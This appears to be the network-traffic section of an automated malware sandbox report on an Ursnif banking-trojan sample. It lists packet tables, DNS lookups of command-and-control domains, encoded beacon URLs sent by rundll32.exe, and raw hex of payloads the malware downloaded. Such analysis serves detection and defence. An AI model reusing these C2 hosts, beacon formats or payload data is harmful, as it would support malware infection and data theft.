                              08/02/21-22:07:15.658662TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4974780192.168.2.3185.228.233.17

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Aug 2, 2021 22:06:41.532124043 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:41.590126038 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:41.590289116 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:41.591708899 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:41.690063000 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.125387907 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.125442028 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.125577927 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.126411915 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.126455069 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.126571894 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.130116940 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.130153894 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.130305052 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.135081053 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.135154009 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.135355949 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.137670040 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.137715101 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.137849092 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.186408997 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.186463118 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.186501980 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.186537981 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.186574936 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.186613083 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.186661005 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.186703920 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.186769009 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.186815023 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.186846018 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.191994905 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.192034960 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.192070961 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.192117929 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.192184925 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.192295074 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.194896936 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.194945097 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.194986105 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.195020914 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.195131063 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.195256948 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.207799911 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.208784103 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.208830118 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.208961010 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.211301088 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.211415052 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.247251034 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.247318983 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.247370005 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.247426033 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.247471094 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.247478962 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.247508049 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.247546911 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.247570992 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.247584105 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.247620106 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.247656107 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.247692108 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.247704983 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.247736931 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.247770071 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.247776985 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.247834921 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.252703905 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.252743006 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.252779961 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.252824068 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.252893925 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.255108118 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.256268978 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.256373882 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.256881952 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.261050940 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.261173010 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.263024092 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.264233112 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.264336109 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.269231081 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.270325899 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.270446062 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.270509958 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.271755934 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.271852970 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.276807070 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.277959108 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.278048038 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.279237986 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.287863970 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.288070917 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.294068098 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.295236111 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.295291901 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.295411110 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.298975945 CEST8049744185.228.233.17192.168.2.3
                              Aug 2, 2021 22:06:42.299104929 CEST4974480192.168.2.3185.228.233.17
                              Aug 2, 2021 22:06:42.301331043 CEST8049744185.228.233.17192.168.2.3

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Aug 2, 2021 22:02:49.268071890 CEST6493853192.168.2.38.8.8.8
                              Aug 2, 2021 22:02:49.292954922 CEST53649388.8.8.8192.168.2.3
                              Aug 2, 2021 22:02:49.721112967 CEST6015253192.168.2.38.8.8.8
                              Aug 2, 2021 22:02:49.755067110 CEST53601528.8.8.8192.168.2.3
                              Aug 2, 2021 22:02:50.064934969 CEST5754453192.168.2.38.8.8.8
                              Aug 2, 2021 22:02:50.100239992 CEST53575448.8.8.8192.168.2.3
                              Aug 2, 2021 22:02:51.521497965 CEST5598453192.168.2.38.8.8.8
                              Aug 2, 2021 22:02:51.546134949 CEST53559848.8.8.8192.168.2.3
                              Aug 2, 2021 22:02:52.580053091 CEST6418553192.168.2.38.8.8.8
                              Aug 2, 2021 22:02:52.605803967 CEST53641858.8.8.8192.168.2.3
                              Aug 2, 2021 22:02:53.928184986 CEST6511053192.168.2.38.8.8.8
                              Aug 2, 2021 22:02:53.952991962 CEST53651108.8.8.8192.168.2.3
                              Aug 2, 2021 22:02:54.875457048 CEST5836153192.168.2.38.8.8.8
                              Aug 2, 2021 22:02:54.907730103 CEST53583618.8.8.8192.168.2.3
                              Aug 2, 2021 22:02:57.002964020 CEST6349253192.168.2.38.8.8.8
                              Aug 2, 2021 22:02:57.029074907 CEST53634928.8.8.8192.168.2.3
                              Aug 2, 2021 22:02:58.020632982 CEST6083153192.168.2.38.8.8.8
                              Aug 2, 2021 22:02:58.075920105 CEST53608318.8.8.8192.168.2.3
                              Aug 2, 2021 22:02:58.909636021 CEST6010053192.168.2.38.8.8.8
                              Aug 2, 2021 22:02:58.934804916 CEST53601008.8.8.8192.168.2.3
                              Aug 2, 2021 22:02:59.959527969 CEST5319553192.168.2.38.8.8.8
                              Aug 2, 2021 22:02:59.984487057 CEST53531958.8.8.8192.168.2.3
                              Aug 2, 2021 22:03:00.747438908 CEST5014153192.168.2.38.8.8.8
                              Aug 2, 2021 22:03:00.774991989 CEST53501418.8.8.8192.168.2.3
                              Aug 2, 2021 22:03:01.779618979 CEST5302353192.168.2.38.8.8.8
                              Aug 2, 2021 22:03:01.814856052 CEST53530238.8.8.8192.168.2.3
                              Aug 2, 2021 22:03:02.832464933 CEST4956353192.168.2.38.8.8.8
                              Aug 2, 2021 22:03:02.859850883 CEST53495638.8.8.8192.168.2.3
                              Aug 2, 2021 22:03:05.295383930 CEST5135253192.168.2.38.8.8.8
                              Aug 2, 2021 22:03:05.322897911 CEST53513528.8.8.8192.168.2.3
                              Aug 2, 2021 22:03:06.081554890 CEST5934953192.168.2.38.8.8.8
                              Aug 2, 2021 22:03:06.107681990 CEST53593498.8.8.8192.168.2.3
                              Aug 2, 2021 22:03:07.152578115 CEST5708453192.168.2.38.8.8.8
                              Aug 2, 2021 22:03:07.185472012 CEST53570848.8.8.8192.168.2.3
                              Aug 2, 2021 22:03:23.688122034 CEST5882353192.168.2.38.8.8.8
                              Aug 2, 2021 22:03:23.732780933 CEST53588238.8.8.8192.168.2.3
                              Aug 2, 2021 22:03:25.145255089 CEST5756853192.168.2.38.8.8.8
                              Aug 2, 2021 22:03:25.183161020 CEST53575688.8.8.8192.168.2.3
                              Aug 2, 2021 22:03:40.807431936 CEST5054053192.168.2.38.8.8.8
                              Aug 2, 2021 22:03:40.858275890 CEST53505408.8.8.8192.168.2.3
                              Aug 2, 2021 22:03:42.654934883 CEST5436653192.168.2.38.8.8.8
                              Aug 2, 2021 22:03:42.688668966 CEST53543668.8.8.8192.168.2.3
                              Aug 2, 2021 22:03:57.858155966 CEST5303453192.168.2.38.8.8.8
                              Aug 2, 2021 22:03:57.899148941 CEST53530348.8.8.8192.168.2.3
                              Aug 2, 2021 22:04:00.330265045 CEST5776253192.168.2.38.8.8.8
                              Aug 2, 2021 22:04:00.367273092 CEST53577628.8.8.8192.168.2.3
                              Aug 2, 2021 22:04:33.279483080 CEST5543553192.168.2.38.8.8.8
                              Aug 2, 2021 22:04:33.315016985 CEST53554358.8.8.8192.168.2.3
                              Aug 2, 2021 22:04:37.726408005 CEST5071353192.168.2.38.8.8.8
                              Aug 2, 2021 22:04:37.774669886 CEST53507138.8.8.8192.168.2.3
                              Aug 2, 2021 22:05:46.569678068 CEST5613253192.168.2.38.8.8.8
                              Aug 2, 2021 22:05:46.637603998 CEST53561328.8.8.8192.168.2.3
                              Aug 2, 2021 22:05:47.149491072 CEST5898753192.168.2.38.8.8.8
                              Aug 2, 2021 22:05:47.182049990 CEST53589878.8.8.8192.168.2.3
                              Aug 2, 2021 22:05:47.793664932 CEST5657953192.168.2.38.8.8.8
                              Aug 2, 2021 22:05:47.826215982 CEST53565798.8.8.8192.168.2.3
                              Aug 2, 2021 22:05:48.327167034 CEST6063353192.168.2.38.8.8.8
                              Aug 2, 2021 22:05:48.381638050 CEST53606338.8.8.8192.168.2.3
                              Aug 2, 2021 22:05:48.981853008 CEST6129253192.168.2.38.8.8.8
                              Aug 2, 2021 22:05:49.014811039 CEST53612928.8.8.8192.168.2.3
                              Aug 2, 2021 22:05:49.771969080 CEST6361953192.168.2.38.8.8.8
                              Aug 2, 2021 22:05:49.807537079 CEST53636198.8.8.8192.168.2.3
                              Aug 2, 2021 22:05:50.400219917 CEST6493853192.168.2.38.8.8.8
                              Aug 2, 2021 22:05:50.433187008 CEST53649388.8.8.8192.168.2.3
                              Aug 2, 2021 22:05:51.236865997 CEST6194653192.168.2.38.8.8.8
                              Aug 2, 2021 22:05:51.270351887 CEST53619468.8.8.8192.168.2.3
                              Aug 2, 2021 22:05:51.961168051 CEST6491053192.168.2.38.8.8.8
                              Aug 2, 2021 22:05:51.986313105 CEST53649108.8.8.8192.168.2.3
                              Aug 2, 2021 22:05:52.410029888 CEST5212353192.168.2.38.8.8.8
                              Aug 2, 2021 22:05:52.444415092 CEST53521238.8.8.8192.168.2.3
                              Aug 2, 2021 22:06:41.235661030 CEST5613053192.168.2.38.8.8.8
                              Aug 2, 2021 22:06:41.502743959 CEST53561308.8.8.8192.168.2.3
                              Aug 2, 2021 22:06:42.699810982 CEST5633853192.168.2.38.8.8.8
                              Aug 2, 2021 22:06:42.976116896 CEST53563388.8.8.8192.168.2.3
                              Aug 2, 2021 22:06:44.303113937 CEST5942053192.168.2.38.8.8.8
                              Aug 2, 2021 22:06:44.337879896 CEST53594208.8.8.8192.168.2.3
                              Aug 2, 2021 22:07:15.117455959 CEST5878453192.168.2.38.8.8.8
                              Aug 2, 2021 22:07:15.144180059 CEST53587848.8.8.8192.168.2.3
                              Aug 2, 2021 22:07:15.292063951 CEST6397853192.168.2.38.8.8.8
                              Aug 2, 2021 22:07:15.594600916 CEST53639788.8.8.8192.168.2.3
                              Aug 2, 2021 22:07:16.198416948 CEST6293853192.168.2.38.8.8.8
                              Aug 2, 2021 22:07:16.503627062 CEST53629388.8.8.8192.168.2.3

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                              Aug 2, 2021 22:06:41.235661030 CEST192.168.2.38.8.8.80xb6fbStandard query (0)gtr.antoinfer.comA (IP address)IN (0x0001)
                              Aug 2, 2021 22:06:42.699810982 CEST192.168.2.38.8.8.80xb20aStandard query (0)gtr.antoinfer.comA (IP address)IN (0x0001)
                              Aug 2, 2021 22:06:44.303113937 CEST192.168.2.38.8.8.80x5a37Standard query (0)gtr.antoinfer.comA (IP address)IN (0x0001)
                              Aug 2, 2021 22:07:15.117455959 CEST192.168.2.38.8.8.80xca7Standard query (0)resolver1.opendns.comA (IP address)IN (0x0001)
                              Aug 2, 2021 22:07:15.292063951 CEST192.168.2.38.8.8.80x8d04Standard query (0)app.flashgameo.atA (IP address)IN (0x0001)
                              Aug 2, 2021 22:07:16.198416948 CEST192.168.2.38.8.8.80xeb2aStandard query (0)app.flashgameo.atA (IP address)IN (0x0001)

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                              Aug 2, 2021 22:06:41.502743959 CEST8.8.8.8192.168.2.30xb6fbNo error (0)gtr.antoinfer.com185.228.233.17A (IP address)IN (0x0001)
                              Aug 2, 2021 22:06:42.976116896 CEST8.8.8.8192.168.2.30xb20aNo error (0)gtr.antoinfer.com185.228.233.17A (IP address)IN (0x0001)
                              Aug 2, 2021 22:06:44.337879896 CEST8.8.8.8192.168.2.30x5a37No error (0)gtr.antoinfer.com185.228.233.17A (IP address)IN (0x0001)
                              Aug 2, 2021 22:07:15.144180059 CEST8.8.8.8192.168.2.30xca7No error (0)resolver1.opendns.com208.67.222.222A (IP address)IN (0x0001)
                              Aug 2, 2021 22:07:15.594600916 CEST8.8.8.8192.168.2.30x8d04No error (0)app.flashgameo.at185.228.233.17A (IP address)IN (0x0001)
                              Aug 2, 2021 22:07:16.503627062 CEST8.8.8.8192.168.2.30xeb2aNo error (0)app.flashgameo.at185.228.233.17A (IP address)IN (0x0001)

                              HTTP Request Dependency Graph

                              • gtr.antoinfer.com
                              • app.flashgameo.at

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              0192.168.2.349744185.228.233.1780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Aug 2, 2021 22:06:41.591708899 CEST12167OUTGET /rlxVSKuL/2_2BsetYpYqkPa4ojd3ueIs/LptIHuoMYe/oePXHReeS37D5yQcj/NVMKXI44Lp_2/FBXX9_2Bb20/jKEI_2Bgs2rJZa/uDvTh6TWLh5vgJvzY3DD5/t9e4NaZqHQBjkiny/8qc8N7JBB_2BWAp/j62HsMJoXm5nFzMKnH/PUlPiGqu_/2BwmGwUAtbFIfQPHyxkA/s1QKb9NHLGrKFNlhNvS/ugnsSzKyJjdaSAXMmE7nnq/w4loggPNqDjSA/3u_2Fu4X/o8m8kFpFCtqZfzxEWO6Thbv/o4OD2d7LJV/azLj6lFTEoSfLl1Au/Hx1vAUoJagaa/8_2Faxj3Ge9/KUQqi9K HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                              Host: gtr.antoinfer.com
                              Aug 2, 2021 22:06:42.125387907 CEST12168INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Mon, 02 Aug 2021 20:06:42 GMT
                              Content-Type: application/octet-stream
                              Content-Length: 194705
                              Connection: close
                              Pragma: public
                              Accept-Ranges: bytes
                              Expires: 0
                              Cache-Control: must-revalidate, post-check=0, pre-check=0
                              Content-Disposition: inline; filename="6108505214a2c.bin"
                              Strict-Transport-Security: max-age=63072000; includeSubdomains
                              X-Content-Type-Options: nosniff
                              Data Raw: e7 d0 25 2c 81 7b 58 78 ac ba 6b a7 51 21 97 c4 b3 04 77 2c f7 4e cb 77 8b a5 dc 66 73 84 09 21 2a ad 9b 63 7c ac c8 38 90 82 50 88 1e e1 b4 45 2f 8e e4 46 12 b0 d8 45 4d 38 12 9e d7 a5 d1 f8 33 67 1c 01 6c 69 7f 64 ac ad 3d 22 91 e2 8f 42 0c 17 36 2a ca 8d c1 6f 32 ef cf c4 98 3c 92 50 c0 f6 29 db 18 a3 d0 f8 74 b0 42 7a b3 a1 57 cd 08 02 ab 74 eb 84 e3 aa 03 d7 21 0a cf d0 eb 3f 61 97 1d dd 2e 21 e5 61 99 e4 5e 3c 14 da 6c d8 2a 4e 04 8f 98 c3 75 4c fc 5d f4 53 86 b6 6b 14 9b 24 c2 38 fd 95 36 27 43 e6 26 1f 44 4b 24 f4 a2 7a eb e1 82 91 f9 af 85 a6 15 1a 13 c8 30 a9 15 ac 08 ca d4 34 bc 66 a6 03 91 7c 7f c7 15 b0 32 5f 16 e7 c2 f4 90 12 05 d9 5d d9 ea 6e b1 c1 80 77 d2 5d 65 ab 08 5d 63 81 5c 2c a4 9c 37 0d 26 5a 14 d7 c4 9b d3 98 3f 4c ea 05 d7 63 36 ac 3d 05 90 54 7f 94 0e d4 fd 0c 01 9a e9 78 c9 9d cc c6 2f 2f 85 e5 e5 8c ba 60 fc e2 41 68 ca 66 0d 46 1f 5f 20 a3 d0 5b f1 f3 c9 bc 18 3f e9 c7 88 de b8 66 17 f7 88 e4 8c c0 ca 4c 92 23 1c 1c 01 cd 2b af 2a eb fa 14 0b ec 60 58 1a 7c 7b 77 10 78 d8 09 b1 8f fc 40 83 65 1b ed d8 eb 6d 7c 84 36 1e 63 7c a8 71 5d 86 53 d0 19 79 4c fd 40 ec 37 f4 9f c1 22 1e bf c3 37 7f c8 20 8e 93 fd c7 4d b1 bd a6 16 f6 b4 fa 91 80 ad 86 c9 e9 5d 60 0b 16 4e 32 b7 f2 3b c8 98 a4 60 e8 12 b4 7f 2e 8a f8 b4 23 a9 4c 59 e0 50 d2 f9 b7 a8 fa b1 b6 96 a2 43 2e 1a 05 02 4d 91 a6 e6 78 1b 27 70 41 cc fc b8 b4 2f f8 51 d7 fd 56 56 e3 a0 e5 3a 8f 37 74 ab dc 2b c8 2e b4 ab 22 de 25 1d 6d d6 f5 d2 ae d0 8e 07 2f b5 8e 31 29 e5 25 5c 3b 11 6c 65 2d 59 38 5e a3 2d e1 59 b6 9c 5b c0 fa a8 70 b3 01 af 2a c8 77 4e f7 33 b1 b5 43 a8 1b 32 8f 32 c3 ae 67 01 b4 94 e1 a5 18 fb 57 53 86 11 be 0f 68 ea 85 b9 4f 04 4d 98 a8 ca e1 cb b3 43 c0 c8 7a 09 dc 10 b0 6f 35 fb ad e8 86 d5 3d 2e e5 61 51 13 92 44 c8 b1 8a d9 ee bf a7 e6 e0 1e 84 a1 59 16 26 3b cf 71 73 a6 2b 1b 75 9e 89 89 e3 d5 33 7d a1 de 43 d8 ba 68 6f 06 d7 41 1d 92 58 58 45 ad d4 e6 54 48 26 28 72 da f5 9c 4d e8 82 0c 3e 12 3a ff 01 12 1a d9 21 f9 b8 55 04 54 37 22 c8 4b 5d 5d 42 da 11 a4 b0 e2 00 03 94 e0 ac d1 0c 67 af 88 3e d7 26 2f ff 74 15 8e 78 18 77 59 c5 0d 42 72 20 53 7a f0 74 56 b6 a3 b7 49 9b 4e fe 60 fd 64 28 ae a3 1a b9 5f db ee e4 62 c7 46 71 5e 2d a1 7b 00 b1 97 5d 13 1e fd 83 b9 6c 64 31 9f 7c f9 91 ad 8f 55 58 ad b1 78 f4 d0 ce ca 42 80 b6 bf d4 02 56 90 e2 ec 91 a2 ec cf 3c e2 8a d6 6d 57 95 5f 18 68 75 89 8f d1 a3 d8 7a 6f 44 45 fb 85 87 85 ab 5e 87 72 db fe d5 46 b6 16 44 d3 c0 dd d5 1b bd f2 3f dd f6 d7 26 47 23 16 4b 12 24 3f 95 35 f4 5b 94 5e eb 2c b5 af 07 0e d1 85 d2 32 f0 2c 11 be d5 bf ad 53 9a e7 2c 7e 82 2b 36 8e 6c d1 e2 49 52 0c b2 30 de 42 95 f6 03 00 5c e0 32 b9 e4 39 d8 14 d9 05 c3 28 35 a1 85 94 ce ea b0 c3 88 a4 c9 6c 0e 58 d4 ef 57 a6 e2 0b fc dc 77 1c 14 5d 37 a8 00 3f e7 02 7d 66 ad 70 29 75 d3
                              Data Ascii: %,{XxkQ!w,Nwfs!*c|8PE/FEM83glid="B6*o2<P)tBzWt!?a.!a^<l*NuL]Sk$86'C&DK$z04f|2_]nw]e]c\,7&Z?Lc6=Tx//`AhfF_ [?fL#+*`X|{wx@em|6c|q]SyL@7"7 M]`N2;`.#LYPC.Mx'pA/QVV:7t+."%m/1)%\;le-Y8^-Y[p*wN3C22gWShOMCzo5=.aQDY&;qs+u3}ChoAXXETH&(rM>:!UT7"K]]Bg>&/txwYBr SztVIN`d(_bFq^-{]ld1|UXxBV<mW_huzoDE^rFD?&G#K$?5[^,2,S,~+6lIR0B\29(5lXWw]7?}fp)u


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              1192.168.2.349745185.228.233.1780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Aug 2, 2021 22:06:43.038395882 CEST12373OUTGET /_2FPQI_2BhXbN/xv2lU8Kt/H_2BdMo7RP11B49_2B_2F0p/qZonO_2BsX/r_2FXf13KB9QuPtJ8/fzPhqB_2BKd8/L6vOPdmyzVt/cOhxQgVRfJCJOJ/2LqjFunTc58GKXt_2Fach/MI8acKZfKve2lDEv/O3RXxaeZ1jmnB_2/BM9wKTm5ezPhIbAkjC/N5BuSzoVY/tbmUpCJD8R6uccF9y9i6/TVII1EazLMdbmsastBa/0EuLYCoDqjXXpV7R0KscZQ/pLkoykG5NbmPg/94pI1TlM/k2tyuNpa_2FFDzXBR3wx_2B/y8INZfX1Fd/ksZUQaKi9Q7CR7rUB/b0tO0OTt2nw2/3iZt0Tq5yV/igZ HTTP/1.1
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Pragma: no-cache
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                              Host: gtr.antoinfer.com
                              Aug 2, 2021 22:06:43.575387001 CEST12375INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Mon, 02 Aug 2021 20:06:43 GMT
                              Content-Type: application/octet-stream
                              Content-Length: 247960
                              Connection: close
                              Pragma: public
                              Accept-Ranges: bytes
                              Expires: 0
                              Cache-Control: must-revalidate, post-check=0, pre-check=0
                              Content-Disposition: inline; filename="6108505382702.bin"
                              Strict-Transport-Security: max-age=63072000; includeSubdomains
                              X-Content-Type-Options: nosniff
                              Data Raw: 0b 3d b5 4c 49 5a 66 90 4d ca 5c c7 ab fd ed c5 68 33 e6 d7 75 6b 1f 78 5b 62 f6 58 24 18 cb 78 45 9b b4 60 f7 90 de a0 53 7c 67 ae e7 91 26 d9 f7 44 54 94 39 43 70 09 28 62 1a 80 c7 34 f3 bc dc 2c b6 d2 61 0d bd 59 56 a6 32 a8 97 63 b6 24 8e af 9b 0d d7 4f e8 f4 51 dc a8 2c 87 98 4e 84 7e 89 ab 69 c4 b3 0a 24 0e 72 d9 63 14 9a 63 34 46 7f 39 b7 d6 f4 7f 12 80 95 30 fe 27 7e 67 61 83 fc e0 41 7b b8 8c b0 fe fa a6 83 2e 14 06 6b f0 0c c9 41 f2 7f 0b 2c 24 9f 12 0f 48 61 80 4e 1c f4 38 7c ae 15 37 e1 05 5c 09 bf 6c fb f0 fb 56 67 ce a1 51 af e1 8a b5 d9 4f b1 8c 62 eb 9a 52 58 7f 7c f9 ae 7a f8 15 9d 0e 91 ee 9e b1 a2 e8 43 26 c0 5a 31 e8 f7 ba dd b0 7b 32 54 9a 4e f5 83 5d ea 00 42 51 c1 61 05 7c aa 4b 8a e8 8e 3f 4f 1f 1c fe 64 c5 fc 9c 46 34 d9 c9 c0 a0 c2 f8 a4 ac 21 96 e6 44 2e 5a 60 aa de 6a bf 38 58 e7 1a af bc d7 29 c7 68 50 8a 80 9c 50 99 22 58 41 5b ec 55 d3 7b 59 9b 58 2d d2 5f e7 74 fe 43 9a 8a 1c ec fc 40 64 11 4e f5 36 33 28 ad ee 4e 96 73 a8 22 f5 43 47 29 5d 8b de 9c 09 48 06 4f 27 1b 74 53 7e 4c 96 ea bc 35 42 3d 84 e9 60 4f ed 03 77 19 75 94 85 c4 bb eb 18 91 a7 42 d3 77 1a 70 0d eb ae ce 9b ca 20 b0 66 68 57 f9 5c db dc f2 77 47 1a 1e 8b 3a 4c a2 91 7e da e8 a9 c9 ad 4c b4 ee 46 19 36 27 08 c5 75 5b 93 da f8 c0 cf 73 93 25 b6 70 10 5a cd 41 5b 67 30 1c 32 47 c0 33 99 ef ab 77 3e 51 5f ac 89 14 ea 0a 39 e5 50 09 97 27 03 c9 43 1b 7d 7d 8d bf 5a 11 74 56 87 b5 4d 87 9f 66 e6 f4 08 58 3e 7e 1e e8 f6 96 5a 8e 34 bd d2 bc 11 ec a1 b8 3e ff 06 f5 d2 a9 40 10 a6 6c 99 a3 4b a3 f8 1d 54 50 4b 79 e2 e8 b4 e6 f4 a2 58 c3 e5 8c dc 4e 25 81 25 e1 3b 7d c9 b0 e7 3f 25 30 d4 c4 eb 9f 28 fe ad d6 47 76 9d 6d d3 f6 3d cc 3c 63 11 83 2d 17 be dc 80 f0 a1 50 d4 21 50 7a 64 24 e0 e3 c8 4a 91 34 c4 b6 2f 27 39 fa 2e ca c5 af 8e 9c 49 07 5f c2 7e 3d 9a 16 56 b2 c1 3b c6 97 2c a2 45 19 04 f5 39 9c 47 c0 1e c8 56 41 30 35 a2 12 76 4b d9 ba 14 d0 9d 00 d1 b9 2f 0d 04 c0 31 a7 55 75 6d 6d 2f e3 65 91 0d c5 35 1b 85 c6 22 c5 6a 8b b0 8e 3e da 62 15 58 a0 80 41 0c db 39 88 d3 b8 e6 04 d4 89 da 0c 36 ea f0 ba e5 2e 36 45 c0 32 5e d4 e9 d1 d2 6a 61 91 0a 7e 85 7b 8f 03 de 9e bb 99 1c 44 06 8d 9f 96 